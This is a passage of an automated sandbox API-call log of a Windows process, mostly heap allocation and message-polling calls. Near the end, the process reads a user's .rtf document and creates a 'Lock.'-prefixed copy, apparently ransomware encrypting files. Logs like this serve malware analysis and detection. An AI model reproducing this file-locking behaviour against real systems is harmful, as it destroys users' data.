dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.634] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0263.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0263.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0263.638] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.638] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.638] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.638] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0263.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/M4zK0AkB79QVLka.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m4zk0akb79qvlka.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0263.639] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0263.640] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0263.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0263.640] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.640] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.640] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0263.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0263.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0263.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.M4zK0AkB79QVLka.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.m4zk0akb79qvlka.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0263.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0263.641] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0263.641] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0263.642] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0263.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0263.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.642] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0263.642] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0263.799] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x52ef, lpOverlapped=0x0) returned 1 [0263.799] ReadFile (in: hFile=0x2c8, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0263.800] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x152ef) returned 0x24b7a48 [0263.800] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.800] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.801] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0263.801] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0263.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0263.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c98 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x152ef) returned 0x24b7a48 [0263.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1798 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.801] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0263.801] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1778 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.802] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.802] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x152ef) returned 0x34b2250 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0263.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0263.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0263.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0263.806] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0263.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.806] RtlAllocateHeap 